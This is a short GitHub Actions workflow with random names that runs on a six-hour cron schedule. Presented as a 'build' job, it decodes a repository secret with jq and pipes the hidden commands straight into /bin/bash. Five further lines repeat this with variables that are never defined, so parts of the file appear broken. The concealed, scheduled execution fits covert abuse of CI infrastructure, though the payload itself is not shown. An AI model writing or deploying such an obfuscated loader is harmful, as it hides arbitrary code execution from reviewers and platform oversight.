name: shenwansi4178
on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenwansi4178
        env:
          l5486: ${{ secrets.l5486 }}
        run: |
          echo $l5486 | jq -r .rt4939 | /bin/bash
          echo $idaa8 | jq -r .d4 | /bin/bash
          echo $xed17 | jq -r .cfoj60865 | /bin/bash
          echo $cxauo1 | jq -r .ic0924 | /bin/bash
          echo $ggap65 | jq -r .lvo0589 | /bin/bash
          echo $vilm1 | jq -r .xhfvv6 | /bin/bash

